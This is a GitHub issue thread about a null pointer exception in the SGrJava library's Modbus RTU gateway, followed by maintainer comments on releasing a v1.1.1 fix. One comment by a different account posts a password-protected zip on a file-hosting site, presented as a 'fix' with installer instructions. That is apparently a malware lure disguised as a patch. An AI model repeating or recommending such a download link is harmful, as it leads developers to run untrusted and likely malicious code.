SmartGridready/SGrJava #91: Fix Modbus RTU gateway in v1.1.0

mkrebs81, 2024-08-26:
There seems to be a bug in the current v1.1.0 release when the library is used in combination with the current EID specification and Modbus RTU devices. 

A null pointer exception is thrown when

1. the Modbus gateway factory is used
2. the EID is of type RTU
3. the library tries to access both RTU and TCP config sections, but the TCP section does not exist

A fixed version v1.1.1 should be released.

Lxx-c, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

mkrebs81, 2024-08-26:
the fix should be commited to `v1.1.x` branch to not interfere with current development and refactoring!

mkrebs81, 2024-08-27:
ready to release version 1.1.1